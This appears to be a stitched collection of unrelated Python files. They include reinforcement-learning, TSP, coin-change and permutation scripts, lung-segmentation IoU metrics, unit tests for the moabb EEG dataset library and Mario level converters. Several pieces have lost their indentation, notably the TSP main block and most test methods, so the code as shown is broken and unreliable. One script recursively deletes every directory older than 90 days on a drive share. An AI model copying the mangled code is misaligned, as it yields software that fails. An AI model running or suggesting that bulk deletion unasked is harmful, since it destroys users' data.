    def display(self, buf=sys.stdout):
        """
        Display children, one parent per paragraph, children indented.
        """
        for x in self.children.keys():
            buf.write(x+':\n')
            if x in self.children:
                for y in self.children[x]:
                    buf.write('\t'+y+'\n')
            buf.write('\n')
    def visit_proc_def(self, node):
        # Record the enclosing procedure so add_child knows its parent.
        debug(self.debug, 'Definition: '+node.name)
        self.parent = node.name
        return 'proc'
    def visit_stmt_pcall(self, node):
        # Procedure call statement -> candidate child.
        debug(self.debug, ' visiting pcall '+node.name)
        self.add_child(node.name)
    def visit_elem_fcall(self, node):
        # Function call element -> candidate child.
        debug(self.debug, ' visiting fcall '+node.name)
        self.add_child(node.name)
|
# -*- coding:utf-8 -*-
import os
import sys
import numpy as np
from simulater import Simulater
from play_back import PlayBack, PlayBacks
COMMAND = ['UP', 'DOWN', 'LEFT', 'RIGHT']
def get_max_command(target_dict):
    """Return the command with the highest value (ties -> lexicographically last command)."""
    best_value_and_command = max((value, command) for command, value in target_dict.items())
    return best_value_and_command[1]
def simplify(command):
    """Abbreviate a command string to its first character."""
    first_char = command[0]
    return first_char
def print_Q(Q, x, y):
    """Print the Q-table as a y-row, x-column grid.

    Each cell shows the first letter of its best action; '0' marks cells
    with no Q entry.
    """
    grid = [['0'] * x for _ in range(y)]
    for position in Q:
        grid[position[1]][position[0]] = simplify(get_max_command(Q[position]))
    for grid_row in grid:
        print(''.join(grid_row))
if __name__ == '__main__':
    # parameters
    file_name = 'default.txt'
    epoch_num = 1000        # training episodes
    max_trial = 5000        # step cap per episode
    gamma = 0.1             # discount factor
    alpha = 0.1             # learning rate
    epsilon = 0.5           # exploration rate (decayed on success)
    # make simulater
    sim = Simulater(file_name)
    # initialize Q value (random normal per state/action pair)
    x, y = sim.map_size()
    Q = {}
    for i in range(x):
        for j in range(y):
            Q[(i, j)] = {_:np.random.normal() for _ in COMMAND}
            #Q[(i, j)] = {_:0.0 for _ in COMMAND}
    # main
    minimum_pbs = None
    for epoch in range(epoch_num):
        sim.reset()
        this_pbs = PlayBacks()
        for i in range(max_trial):
            # get current
            current_x, current_y = sim.get_current()
            # select_command (epsilon-greedy)
            tmp_Q = Q[(current_x, current_y)]
            command = get_max_command(tmp_Q) if np.random.uniform() > epsilon else np.random.choice(COMMAND)
            current_value = tmp_Q[command]
            # reward
            reward = sim(command)
            # update (standard Q-learning TD target)
            next_x, next_y = sim.get_current()
            next_max_command = get_max_command(Q[(next_x, next_y)])
            next_value = Q[(next_x, next_y)][next_max_command]
            tmp_Q[command] += alpha * (reward + gamma * next_value - current_value)
            # play back (record transition for the replay pass below)
            this_pbs.append(PlayBack((current_x, current_y),
                                     command,
                                     (next_x, next_y),
                                     reward))
            # end check
            if sim.end_episode():
                print('find goal')
                # Decay exploration after each success, floored at 0.05.
                epsilon *= 0.95
                if epsilon < 0.05:
                    epsilon = 0.05
                # Keep the shortest successful trajectory seen so far.
                if minimum_pbs is None:
                    minimum_pbs = this_pbs
                elif len(minimum_pbs) > len(this_pbs):
                    minimum_pbs = this_pbs
                print(epsilon)
                break
        # update with minimum_pbs (replay the best trajectory)
        if minimum_pbs is not None:
            for pb in minimum_pbs:
                tmp_Q = Q[pb.state]
                current_value = tmp_Q[pb.action]
                next_Q = Q[pb.next_state]
                next_max_command = get_max_command(next_Q)
                next_value = next_Q[next_max_command]
                tmp_Q[pb.action] += alpha * (pb.reward + gamma * next_value - current_value)
    sim.printing()
    print('---')
    print_Q(Q, x, y)
    print('---')
|
import itertools
import matplotlib.pyplot as plt
from util import City, read_cities, write_cities_and_return_them, generate_cities, path_cost
def solve_tsp_dynamic(cities):
    """Exact TSP via Held-Karp dynamic programming over city subsets.

    Returns the visiting order (list of indices into `cities`, starting
    at 0) of a minimum-cost tour.  O(2^n * n^2) time and memory, so only
    practical for small n (~16).
    """
    # Pairwise distance matrix.
    distance_matrix = [[x.distance(y) for y in cities] for x in cities]
    # Base case: best path from city 0 to each city j over the set {0, j}.
    cities_a = {(frozenset([0, idx + 1]), idx + 1): (dist, [0, idx + 1]) for idx, dist in
                enumerate(distance_matrix[0][1:])}
    for m in range(2, len(cities)):
        cities_b = {}
        # Extend to every subset of size m+1 that contains city 0.
        for cities_set in [frozenset(C) | {0} for C in itertools.combinations(range(1, len(cities)), m)]:
            for j in cities_set - {0}:
                # Best path ending at j: best path over set-{j} ending at k, plus edge k->j.
                cities_b[(cities_set, j)] = min([(cities_a[(cities_set - {j}, k)][0] + distance_matrix[k][j],
                                                  cities_a[(cities_set - {j}, k)][1] + [j])
                                                 for k in cities_set if k != 0 and k != j])
        cities_a = cities_b
    # Close the tour back to city 0 and take the cheapest full path.
    res = min([(cities_a[d][0] + distance_matrix[0][d[1]], cities_a[d][1]) for d in iter(cities_a)])
    return res[1]
if __name__ == "__main__":
cities = read_cities(16)
g = solve_tsp_dynamic(cities)
sol = [cities[gi] for gi in g]
print(path_cost(sol))
plt.show(block=True)
|
import datetime
import os
import shutil
import re
#Set a base Dir
# DANGER: this script PERMANENTLY deletes (shutil.rmtree) every directory
# under basedir whose mtime is older than 90 days — review before running.
basedir = r"\\localhost\d$"
for dirpath, dirnames, filenames in os.walk(basedir):
    for d in dirnames:
        curpath = os.path.join(dirpath, d)
        # Directory mtime as a datetime, for age comparison.
        dir_modified = datetime.datetime.fromtimestamp(os.path.getmtime(curpath))
        # Conditional set to remove folders recursively older than 90 days.
        if datetime.datetime.now() - dir_modified > datetime.timedelta(days=90):
            # NOTE(review): deleting while os.walk iterates relies on the walk
            # silently skipping vanished subdirs (onerror defaults to None) —
            # confirm that is acceptable here.
            shutil.rmtree(curpath)
|
# Function to find the minimum number of coins required
# to get total of N from set S
def findMinCoins(S, N):
    """Return the minimum number of coins from denominations S that total N.

    Classic bottom-up DP; returns float('inf') when N cannot be formed.
    """
    INF = float('inf')
    # T[total] = minimum coins needed to reach `total`; 0 coins reach 0.
    T = [0] + [INF] * N
    for total in range(1, N + 1):
        for coin in S:
            remainder = total - coin
            # Only extend from reachable sub-totals.
            if remainder >= 0 and T[remainder] != INF:
                T[total] = min(T[total], T[remainder] + 1)
    return T[N]
# if __name__ == '__main__':
# # n coins of given denominations
# S = [1, 2, 3, 4]
# # Total Change required
# N = 15
# coins = findMinCoins(S, N)
# if coins != float('inf'):
# print("Minimum number of coins required to get desired change is", coins) |
import skimage
import numpy as np
from PIL import Image
from albumentations import Resize
from data.transform import simple_transform
def get_iou(x1, x2):
    """Intersection-over-union of two binary masks.

    Defined as 1.0 when both masks are empty and 0.0 when the union is
    empty but the intersection is not (unreachable for binary masks).
    """
    overlap = np.clip(x1 * x2, 0, 1).sum()
    combined = np.clip(x1 + x2, 0, 1).sum()
    if combined == 0:
        return 1. if overlap == 0 else 0.
    return overlap / combined
def precision_at(threshold, iou):
    """Count object matches in an IoU matrix at a given threshold.

    Rows are ground-truth objects, columns are predicted objects.
    Returns (tp, fp, fn): tp = GT objects matched by exactly one
    prediction, fp = predictions matching no GT object, fn = GT objects
    matched by no prediction.
    """
    matches = iou > threshold
    row_hits = np.sum(matches, axis=1)
    col_hits = np.sum(matches, axis=0)
    tp = np.sum(row_hits == 1)
    fp = np.sum(col_hits == 0)
    fn = np.sum(row_hits == 0)
    return tp, fp, fn
def get_instance_iou(gt, pr, thresholds, beta=1, verbose=1):
    """
    Calculate instance-wise F-score in range(0.5, 1, 0.05)
    Source:
        https://github.com/selimsef/dsb2018_topcoders/blob/master/selim/metric.py
    Args:
        gt: ground truth instances mask (each instance has its own unique value)
        pr: predicted instances mask (each instance has its own unique value)
        thresholds: iterable of IoU thresholds to evaluate at
        beta: F-score beta coeffitient
        verbose: verbosity level
    Returns:
        score: list of per-threshold precision (F-beta) values
    """
    # separate instances (re-label connected components)
    gt = skimage.measure.label(gt)
    pr = skimage.measure.label(pr)
    print_fn = lambda x: print(x) if verbose else None
    true_objects = len(np.unique(gt))
    pred_objects = len(np.unique(pr))
    # Compute intersection between all objects
    intersection = np.histogram2d(gt.flatten(), pr.flatten(), bins=(true_objects, pred_objects))[0]
    # Compute areas (needed for finding the union between all objects)
    area_true = np.histogram(gt, bins=true_objects)[0]
    area_pred = np.histogram(pr, bins=pred_objects)[0]
    area_true = np.expand_dims(area_true, -1)
    area_pred = np.expand_dims(area_pred, 0)
    # Compute union
    union = area_true + area_pred - intersection
    # Exclude background from the analysis
    intersection = intersection[1:, 1:]
    union = union[1:, 1:]
    # Avoid division by zero for empty pairs.
    union[union == 0] = 1e-9
    # Compute the intersection over union
    iou = intersection / union
    # Loop over IoU thresholds
    prec = []
    print_fn("Thresh\tTP\tFP\tFN\tPrec.")
    for t in thresholds:
        tp, fp, fn = precision_at(t, iou)
        if tp + fp + fn == 0:
            # No objects in either mask at this threshold: score as perfect.
            p = 1.
        else:
            # F-beta with a small additive term guarding against 0/0.
            p = (1 + beta ** 2) * tp / ((1 + beta ** 2) * tp + fp + beta ** 2 * fn + 1e-10)
        print_fn("{:1.3f}\t{}\t{}\t{}\t{:1.3f}".format(t, tp, fp, fn, p))
        prec.append(p)
    print_fn("AP\t-\t-\t-\t{:1.3f}".format(np.mean(prec)))
    return prec
def split_mask_to_zones(mask, lungs_labeled_mask, intersection_threshold=0.3):
    """Split a binary mask into background / left-lung / right-lung zone masks.

    Each connected instance in `mask` is attributed to every zone that
    covers more than `intersection_threshold` of its area; the overlapping
    part of the instance is added to that zone's output mask.
    Returns [background_mask, left_lung_mask, right_lung_mask].
    """
    # split lungs mask to separate masks, one area for each mask
    lung_labels = [0, 1, 2]
    assert np.unique(lungs_labeled_mask).tolist() == lung_labels
    lung_areas = [lungs_labeled_mask == label for label in lung_labels]
    # placeholder for result
    background_mask = np.zeros_like(mask)
    left_lung_mask = np.zeros_like(mask)
    right_lung_mask = np.zeros_like(mask)
    mask_areas = [background_mask, left_lung_mask, right_lung_mask]
    # extract instances from mask (connected-component labelling)
    labeled_mask = skimage.measure.label(mask)
    mask_labels = np.unique(labeled_mask)[1:]  # to remove background
    for label in mask_labels:
        one_instance_mask = (labeled_mask == label)
        one_instance_sum = one_instance_mask.sum()
        for area_label in [0, 1, 2]:  # 0 - backgound, 1 - left lung, 2 - right
            intersection = one_instance_mask * lung_areas[area_label]
            if intersection.sum() / one_instance_sum > intersection_threshold:
                mask_areas[area_label] += intersection
    return mask_areas
class LungRegionFeaturesExtractor:
    """Computes IoU-based agreement features between an expert mask and a
    sample mask, both overall and per lung zone (background / left / right).
    """
    def __init__(self, resize = 256):
        # Average lung-zone mask with labels 0/1/2, resized to the working size.
        # NOTE(review): hard-coded relative path — only works when run from
        # the expected working directory; confirm.
        self.lungs_labeled_mask = Resize(resize, resize).apply_to_mask(
            np.array(Image.open("../../data/masks012/average_mask.png"))
        )
        # IoU thresholds used for the instance-wise scores.
        self.thresholds = np.arange(0, 1, 0.1)
    def extract(self, sample_mask, expert_mask):
        """Return an 8-element feature vector:
        [whole-mask IoU, whole-mask mean instance IoU,
         per-zone IoU (bg, left, right), per-zone mean instance IoU (bg, left, right)].
        """
        expert_masks = split_mask_to_zones(expert_mask, self.lungs_labeled_mask, intersection_threshold=0.3)
        sample_masks = split_mask_to_zones(sample_mask, self.lungs_labeled_mask, intersection_threshold=0.3)
        ious_1 = [get_iou(em, sm) for em, sm in zip(expert_masks, sample_masks)]
        ious_2 = [np.mean(get_instance_iou(em, sm, thresholds=self.thresholds, verbose=False)) for em, sm in
                  zip(expert_masks, sample_masks)]
        return np.array([
            get_iou(expert_mask, sample_mask),
            np.mean(get_instance_iou(expert_mask, sample_mask, thresholds=self.thresholds, verbose=0)),
            ious_1[0],
            ious_1[1],
            ious_1[2],
            ious_2[0],
            ious_2[1],
            ious_2[2],
        ])
|
import inspect
import logging
import shutil
import tempfile
import unittest
import mne
import numpy as np
import moabb.datasets as db
import moabb.datasets.compound_dataset as db_compound
from moabb.datasets import Cattan2019_VR, Shin2017A, Shin2017B
from moabb.datasets.base import BaseDataset, is_abbrev, is_camel_kebab_case
from moabb.datasets.compound_dataset import CompoundDataset
from moabb.datasets.compound_dataset.utils import compound_dataset_list
from moabb.datasets.fake import FakeDataset, FakeVirtualRealityDataset
from moabb.datasets.utils import block_rep, dataset_list
from moabb.paradigms import P300
from moabb.utils import aliases_list
_ = mne.set_log_level("CRITICAL")
def _run_tests_on_dataset(d):
    """Smoke-test every subject of dataset `d`: structure checks plus event dump."""
    for subject in d.subject_list:
        data = d.get_data(subjects=[subject])
        # The loader must hand back a dict keyed by subject.
        assert isinstance(data, dict)
        # Drill down to the first run of the first session: must be an MNE Raw.
        raw = data[subject]["session_0"]["run_0"]
        assert issubclass(type(raw), mne.io.BaseRaw), type(raw)
        # Dump the event table for eyeballing.
        print(mne.find_events(raw))
        print(d.event_id)
class TestRegex(unittest.TestCase):
    """Unit tests for the dataset-naming helper predicates."""
    def test_is_abbrev(self):
        # An abbreviation must be a prefix followed immediately by a
        # non-letter boundary, per the cases exercised here.
        assert is_abbrev("a", "a-")
        assert is_abbrev("a", "a0")
        assert is_abbrev("a", "ab")
        assert not is_abbrev("a", "aA")
        assert not is_abbrev("a", "Aa")
        assert not is_abbrev("a", "-a")
        assert not is_abbrev("a", "0a")
        assert not is_abbrev("a", "ba")
        assert not is_abbrev("a", "a ")
    def test_is_camell_kebab_case(self):
        # CamelCase with optional kebab separators and digits; whitespace
        # and underscores are rejected.
        assert is_camel_kebab_case("Aa")
        assert is_camel_kebab_case("aAa")
        assert is_camel_kebab_case("Aa-a")
        assert is_camel_kebab_case("1Aa-1a1")
        assert is_camel_kebab_case("AB")
        assert not is_camel_kebab_case("A ")
        assert not is_camel_kebab_case(" A")
        assert not is_camel_kebab_case("A A")
        assert not is_camel_kebab_case("A_")
        assert not is_camel_kebab_case("_A")
        assert not is_camel_kebab_case("A_A")
class Test_Datasets(unittest.TestCase):
def test_fake_dataset(self):
"""This test will insure the basedataset works."""
n_subjects = 3
n_sessions = 2
n_runs = 2
for paradigm in ["imagery", "p300", "ssvep", "cvep"]:
ds = FakeDataset(
n_sessions=n_sessions,
n_runs=n_runs,
n_subjects=n_subjects,
paradigm=paradigm,
)
data = ds.get_data()
# we should get a dict
self.assertTrue(isinstance(data, dict))
# we get the right number of subject
self.assertEqual(len(data), n_subjects)
# right number of session
self.assertEqual(len(data[1]), n_sessions)
# right number of run
self.assertEqual(len(data[1]["session_0"]), n_runs)
# We should get a raw array at the end
self.assertIsInstance(data[1]["session_0"]["run_0"], mne.io.BaseRaw)
# bad subject id must raise error
self.assertRaises(ValueError, ds.get_data, [1000])
def test_fake_dataset_seed(self):
"""this test will insure the fake dataset's random seed works"""
n_subjects = 3
n_sessions = 2
n_runs = 2
seed = 12
for paradigm in ["imagery", "p300", "ssvep"]:
ds1 = FakeDataset(
n_sessions=n_sessions,
n_runs=n_runs,
n_subjects=n_subjects,
paradigm=paradigm,
seed=seed,
)
ds2 = FakeDataset(
n_sessions=n_sessions,
n_runs=n_runs,
n_subjects=n_subjects,
paradigm=paradigm,
seed=seed,
)
X1, _, _ = ds1.get_data()
X2, _, _ = ds2.get_data()
X3, _, _ = ds2.get_data()
# All the arrays should be equal:
self.assertIsNone(np.testing.assert_array_equal(X1, X2))
self.assertIsNone(np.testing.assert_array_equal(X3, X3))
def test_cache_dataset(self):
tempdir = tempfile.mkdtemp()
for paradigm in ["imagery", "p300", "ssvep"]:
dataset = FakeDataset(paradigm=paradigm)
# Save cache:
with self.assertLogs(
logger="moabb.datasets.bids_interface", level="INFO"
) as cm:
_ = dataset.get_data(
subjects=[1],
cache_config=dict(
save_raw=True,
use=True,
overwrite_raw=False,
path=tempdir,
),
)
print("\n".join(cm.output))
expected = [
"Attempting to retrieve cache .* datatype-eeg", # empty pipeline
"No cache found at",
"Starting caching .* datatype-eeg",
"Finished caching .* datatype-eeg",
]
self.assertEqual(len(expected), len(cm.output))
for i, regex in enumerate(expected):
self.assertRegex(cm.output[i], regex)
# Load cache:
with self.assertLogs(
logger="moabb.datasets.bids_interface", level="INFO"
) as cm:
_ = dataset.get_data(
subjects=[1],
cache_config=dict(
save_raw=True,
use=True,
overwrite_raw=False,
path=tempdir,
),
)
print("\n".join(cm.output))
expected = [
"Attempting to retrieve cache .* datatype-eeg",
"Finished reading cache .* datatype-eeg",
]
self.assertEqual(len(expected), len(cm.output))
for i, regex in enumerate(expected):
self.assertRegex(cm.output[i], regex)
# Overwrite cache:
with self.assertLogs(
logger="moabb.datasets.bids_interface", level="INFO"
) as cm:
_ = dataset.get_data(
subjects=[1],
cache_config=dict(
save_raw=True,
use=True,
overwrite_raw=True,
path=tempdir,
),
)
print("\n".join(cm.output))
expected = [
"Starting erasing cache .* datatype-eeg",
"Finished erasing cache .* datatype-eeg",
"Starting caching .* datatype-eeg",
"Finished caching .* datatype-eeg",
]
self.assertEqual(len(expected), len(cm.output))
for i, regex in enumerate(expected):
self.assertRegex(cm.output[i], regex)
shutil.rmtree(tempdir)
def test_dataset_accept(self):
    """Verify that the accept-licence gate is working."""
    # Only BaseShin2017 (bbci_eeg_fnirs) requires licence acceptance for now.
    for dataset in (Shin2017A(), Shin2017B()):
        # Skip the check when the data has already been downloaded.
        if mne.get_config("MNE_DATASETS_BBCIFNIRS_PATH") is not None:
            continue
        # Without accepting the licence, fetching data must fail.
        with self.assertRaises(AttributeError):
            dataset.get_data([1])
def test_datasets_init(self):
    """Instantiate every registered dataset and check that codes are unique."""
    codes = []
    logger = logging.getLogger("moabb.datasets.base")
    deprecated_list, _, _ = zip(*aliases_list)
    for ds in dataset_list:
        kwargs = {}
        # Some datasets require an explicit licence acceptance flag.
        if inspect.signature(ds).parameters.get("accept"):
            kwargs["accept"] = True
        with self.assertLogs(logger="moabb.datasets.base", level="WARNING") as cm:
            # We test if the is_abrev does not throw a warning.
            # Trick needed because assertNoLogs only introduced in python 3.10:
            # emit one warning ourselves so assertLogs is satisfied, then
            # check it stayed the *only* warning for non-deprecated datasets.
            logger.warning(f"Testing {ds.__name__}")
            obj = ds(**kwargs)
        if type(obj).__name__ not in deprecated_list:
            self.assertEqual(len(cm.output), 1)
        self.assertIsNotNone(obj)
        if type(obj).__name__ not in deprecated_list:
            codes.append(obj.code)
    # Check that all codes are unique:
    self.assertEqual(len(codes), len(set(codes)))
def test_depreciated_datasets_init(self):
    """Deprecated dataset aliases must emit a warning on instantiation."""
    depreciated_names, _, _ = zip(*aliases_list)
    for ds in db.__dict__.values():
        # Skip datasets that are in the official list (not deprecated)...
        if ds in dataset_list:
            continue
        # ...and module members that are not dataset classes at all.
        if not (inspect.isclass(ds) and issubclass(ds, BaseDataset)):
            continue
        kwargs = {}
        if inspect.signature(ds).parameters.get("accept"):
            kwargs["accept"] = True
        with self.assertLogs(logger="moabb.utils", level="WARNING"):
            # We test if depreciated_alias throws a warning.
            obj = ds(**kwargs)
        self.assertIsNotNone(obj)
        self.assertIn(ds.__name__, depreciated_names)
def test_dataset_list(self):
    """dataset_list must contain exactly the BaseDataset subclasses in db."""
    if aliases_list:
        depreciated_list, _, _ = zip(*aliases_list)
    else:
        # Keep the name defined either way so the commented-out filter
        # below can be re-enabled safely (mirrors the equivalent method in
        # Test_CompoundDataset, which assigns [] here instead of `pass`).
        depreciated_list = []
    all_datasets = [
        c
        for c in db.__dict__.values()
        if (
            inspect.isclass(c)
            and issubclass(c, BaseDataset)
            # and c.__name__ not in depreciated_list
        )
    ]
    assert len(dataset_list) == len(all_datasets)
    assert set(dataset_list) == set(all_datasets)
class Test_VirtualReality_Dataset(unittest.TestCase):
    """Tests for the Cattan2019_VR dataset and its fake counterpart."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

    def test_canary(self):
        # Smoke test: the dataset can be instantiated at all.
        assert Cattan2019_VR() is not None

    def test_warning_if_parameters_false(self):
        # Disabling both recording conditions leaves nothing to load,
        # which should be signalled to the user.
        with self.assertWarns(UserWarning):
            Cattan2019_VR(virtual_reality=False, screen_display=False)

    def test_data_path(self):
        # One file per enabled condition (VR and PC) for subject 1.
        ds = Cattan2019_VR(virtual_reality=True, screen_display=True)
        data_path = ds.data_path(1)
        assert len(data_path) == 2
        assert "subject_01_VR.mat" in data_path[0]
        assert "subject_01_PC.mat" in data_path[1]

    def test_get_block_repetition(self):
        # get_block_repetition must return only the requested
        # subject/block/repetition combination.
        ds = FakeVirtualRealityDataset()
        subject = 5
        block = 3
        repetition = 4
        _, _, ret = ds.get_block_repetition(P300(), [subject], [block], [repetition])
        assert ret.subject.unique()[0] == subject
        assert ret.run.unique()[0] == block_rep(block, repetition)
class Test_CompoundDataset(unittest.TestCase):
    """Tests for CompoundDataset composition, data access and registration."""

    def __init__(self, *args, **kwargs):
        # Base fake P300 dataset shared by all the tests below.
        self.paradigm = "p300"
        self.n_sessions = 2
        self.n_subjects = 2
        self.n_runs = 2
        self.ds = FakeDataset(
            n_sessions=self.n_sessions,
            n_runs=self.n_runs,
            n_subjects=self.n_subjects,
            event_list=["Target", "NonTarget"],
            paradigm=self.paradigm,
        )
        super().__init__(*args, **kwargs)

    def test_fake_dataset(self):
        """This test will ensure the basedataset works."""
        # (sessions, runs) selections: everything, one by name, one by list.
        param_list = [(None, None), ("session_0", "run_0"), (["session_0"], ["run_0"])]
        for sessions, runs in param_list:
            with self.subTest():
                subjects_list = [(self.ds, 1, sessions, runs)]
                compound_data = CompoundDataset(
                    subjects_list,
                    code="CompoundDataset-test",
                    interval=[0, 1],
                    paradigm=self.paradigm,
                )
                data = compound_data.get_data()
                # Check event_id is correctly set
                self.assertEqual(compound_data.event_id, self.ds.event_id)
                # Check data origin is correctly set
                self.assertEqual(data[1]["data_origin"], subjects_list[0])
                # Check data type
                self.assertTrue(isinstance(data, dict))
                self.assertIsInstance(data[1]["session_0"]["run_0"], mne.io.BaseRaw)
                # Check data size
                self.assertEqual(len(data), 1)
                expected_session_number = self.n_sessions if sessions is None else 1
                self.assertEqual(len(data[1]), expected_session_number)
                expected_runs_number = self.n_runs if runs is None else 1
                self.assertEqual(len(data[1]["session_0"]), expected_runs_number)
                # bad subject id must raise error
                self.assertRaises(ValueError, compound_data.get_data, [1000])

    def test_compound_dataset_composition(self):
        # Test we can compound two instance of CompoundDataset into a new one.
        # Create an instance of CompoundDataset with one subject
        subjects_list = [(self.ds, 1, None, None)]
        compound_dataset = CompoundDataset(
            subjects_list,
            code="CompoundDataset-test",
            interval=[0, 1],
            paradigm=self.paradigm,
        )
        # Add it two time to a subjects_list
        subjects_list = [compound_dataset, compound_dataset]
        compound_data = CompoundDataset(
            subjects_list,
            code="CompoundDataset-test",
            interval=[0, 1],
            paradigm=self.paradigm,
        )
        # Assert that the compounded dataset has two times more subjects
        # than the original one.
        data = compound_data.get_data()
        self.assertEqual(len(data), 2)

    def test_get_sessions_per_subject(self):
        # define a new fake dataset with two times more sessions:
        self.ds2 = FakeDataset(
            n_sessions=self.n_sessions * 2,
            n_runs=self.n_runs,
            n_subjects=self.n_subjects,
            event_list=["Target", "NonTarget"],
            paradigm=self.paradigm,
        )
        # Add the two datasets to a CompoundDataset
        subjects_list = [(self.ds, 1, None, None), (self.ds2, 1, None, None)]
        compound_dataset = CompoundDataset(
            subjects_list,
            code="CompoundDataset",
            interval=[0, 1],
            paradigm=self.paradigm,
        )
        # Test private method _get_sessions_per_subject returns the minimum
        # number of sessions per subjects
        self.assertEqual(compound_dataset._get_sessions_per_subject(), self.n_sessions)

    def test_event_id_correctly_updated(self):
        # define a new fake dataset with different event_id
        self.ds2 = FakeDataset(
            n_sessions=self.n_sessions,
            n_runs=self.n_runs,
            n_subjects=self.n_subjects,
            event_list=["Target2", "NonTarget2"],
            paradigm=self.paradigm,
        )
        # Add the two datasets to a CompoundDataset
        subjects_list = [(self.ds, 1, None, None), (self.ds2, 1, None, None)]
        compound_dataset = CompoundDataset(
            subjects_list,
            code="CompoundDataset",
            interval=[0, 1],
            paradigm=self.paradigm,
        )
        # Check that the event_id of the compound_dataset is the same as
        # the first dataset
        self.assertEqual(compound_dataset.event_id, self.ds.event_id)
        # Check event_id get correctly updated when taking a subject from dataset 2
        data = compound_dataset.get_data(subjects=[2])
        self.assertEqual(compound_dataset.event_id, self.ds2.event_id)
        self.assertEqual(len(data.keys()), 1)
        # Check event_id is correctly put back when taking a subject from
        # the first dataset
        data = compound_dataset.get_data(subjects=[1])
        self.assertEqual(compound_dataset.event_id, self.ds.event_id)
        self.assertEqual(len(data.keys()), 1)

    def test_datasets_init(self):
        # Every registered compound dataset must instantiate and carry a
        # unique code.
        codes = []
        for ds in compound_dataset_list:
            kwargs = {}
            if inspect.signature(ds).parameters.get("accept"):
                kwargs["accept"] = True
            obj = ds(**kwargs)
            self.assertIsNotNone(obj)
            codes.append(obj.code)
        # Check that all codes are unique:
        self.assertEqual(len(codes), len(set(codes)))

    def test_dataset_list(self):
        # compound_dataset_list must match the CompoundDataset subclasses
        # found in db_compound (minus deprecated aliases and the base class).
        if aliases_list:
            depreciated_list, _, _ = zip(*aliases_list)
        else:
            depreciated_list = []
        all_datasets = [
            c
            for c in db_compound.__dict__.values()
            if (
                inspect.isclass(c)
                and issubclass(c, CompoundDataset)
                and c.__name__ not in depreciated_list
                and c.__name__ != "CompoundDataset"
            )
        ]
        assert len(compound_dataset_list) == len(all_datasets)
        assert set(compound_dataset_list) == set(all_datasets)
|
# Global counter of permutations printed by prPerms().
count = 0
def isTriplet(word, l):
    """Return True if `word` contains the letter `l` three times in a row."""
    target = l * 3
    return any(word[i:i + 3] == target for i in range(len(word) - 2))
# Sample words (correct spelling and a typo'd variant); not used by main().
originalword = "statisticians"
myword = "statstcians"
def main():
    """Entry point: print all permutations of "abcd" and their count."""
    countPerms()
def countPerms():
    """Print every permutation of "abcd", then print the total count."""
    prPerms("", "abcd")
    print(count)
def prPerms(start, choices):
    """Print every permutation of `choices` appended to `start`.

    Each complete permutation increments the module-level `count`.
    """
    global count
    if not choices:
        print(start)
        count += 1
        return
    for i, letter in enumerate(choices):
        # Recurse with `letter` consumed from the remaining choices.
        prPerms(start + letter, choices[:i] + choices[i + 1:])
# Run the permutation counter when the script is executed.
main()
|
from pathlib import Path
import os
# Translation table from VGLC "Super Mario Bros" tile characters to the
# target level alphabet: '-' empty, 'b' solid block, 'A' enemy, '$' coin,
# 'M' moving platform, 'f' floor.
_SMB1_TILES = {
    '-': '-',
    'X': 'b', 'x': 'b', 'S': 'b', 'Q': 'b', '<': 'b', '>': 'b',
    '[': 'b', ']': 'b', 'b': 'b', '?': 'b', '#': 'b', 'p': 'b', 'P': 'b',
    'E': 'A', 'e': 'A', 'g': 'A',
    'o': '$',
    'B': 'M', 'c': 'M',
    'f': 'f',
}


def convert_super_mario_bros_tile(character):
    """Convert one Super Mario Bros tile character to the target alphabet.

    Unknown characters are reported on stdout and returned unchanged.
    """
    try:
        return _SMB1_TILES[character]
    except KeyError:
        print(f'{character} not handled by conversion')
        return character
# Translation table for VGLC "Super Mario Bros 2 (Japan)" tiles.
_SMB2J_TILES = {
    '-': '-',
    'f': 'f',
    'b': 'b', 'X': 'b', '?': 'b', 'Q': 'b', '<': 'b', '>': 'b',
    '[': 'b', ']': 'b', 'S': 'b',
    'E': 'A',
    'o': '$',
    'B': 'M',
}


def convert_super_mario_bros_2_japan_tile(character):
    """Convert one SMB2 (Japan) tile character to the target alphabet.

    Unknown characters are reported on stdout and returned unchanged.
    """
    try:
        return _SMB2J_TILES[character]
    except KeyError:
        print(f'{character} not handled by conversion')
        return character
# Translation table for VGLC "Super Mario Land" tiles.
_SML_TILES = {
    '-': '-',
    'f': 'f',
    'X': 'b', '[': 'b', ']': 'b', '<': 'b', '>': 'b',
    'Q': 'b', '?': 'b', 'S': 'b', 'b': 'b',
    'E': 'A',
    'o': '$',
    'B': 'M',
}


def convert_super_mario_bros_mario_land_tile(character):
    """Convert one Super Mario Land tile character to the target alphabet.

    Unknown characters are reported on stdout and returned unchanged.
    """
    try:
        return _SML_TILES[character]
    except KeyError:
        print(f'{character} not handled by conversion')
        return character
# Translation table for VGLC "Super Mario Bros 2" tiles.
# NOTE: the original elif chain had a duplicate, unreachable branch for 'e';
# the dict form removes that dead code without changing behavior.
_SMB2_TILES = {
    '-': '-',
    'p': 'b', 'P': 'b', '?': 'b', '#': 'b', 'B': 'b',
    'e': 'A',
    'g': 'g',
    'f': 'f',
    'c': 'M',
}


def convert_super_mario_bros_2_tile(character):
    """Convert one Super Mario Bros 2 tile character to the target alphabet.

    Unknown characters are reported on stdout and returned unchanged.
    """
    try:
        return _SMB2_TILES[character]
    except KeyError:
        print(f'{character} not handled by conversion')
        return character
def convert(path, name, start_col, conversion, vertical=False):
    """Convert every VGLC level file in `path` to the PCG platformer format.

    Each row gets an extra floor tile ('f') appended, every tile is mapped
    through `conversion`, and a spawn marker 's' is written into the lowest
    empty cell of column `start_col`. Output goes to
    ../Assets/Resources/Levels/<name>/.

    NOTE(review): `vertical` is currently unused; kept for API compatibility.
    """
    pcg_platformer_path = os.path.join('..', 'Assets', 'Resources', 'Levels', name)
    # makedirs(exist_ok=True) also creates missing parents, unlike os.mkdir.
    os.makedirs(pcg_platformer_path, exist_ok=True)
    for file_name in os.listdir(path):
        # Context managers guarantee the files are closed (the original
        # leaked both the input and output handles).
        with open(os.path.join(path, file_name)) as f:
            content = f.readlines()
        converted = []
        for line in content:
            row = list(line.strip())
            row.append('f')  # terminate each row with a floor tile
            converted.append([conversion(c) for c in row])
        # Find where the player can start: the lowest empty cell in the
        # start column.
        start_row = len(converted) - 1
        while converted[start_row][start_col] != '-':
            start_row -= 1
        converted[start_row][start_col] = 's'
        file_name = file_name.replace('.png', '')
        with open(os.path.join(pcg_platformer_path, file_name), 'w') as f:
            f.write('\n'.join(''.join(row) for row in converted))
def get_vglc_path(game_name):
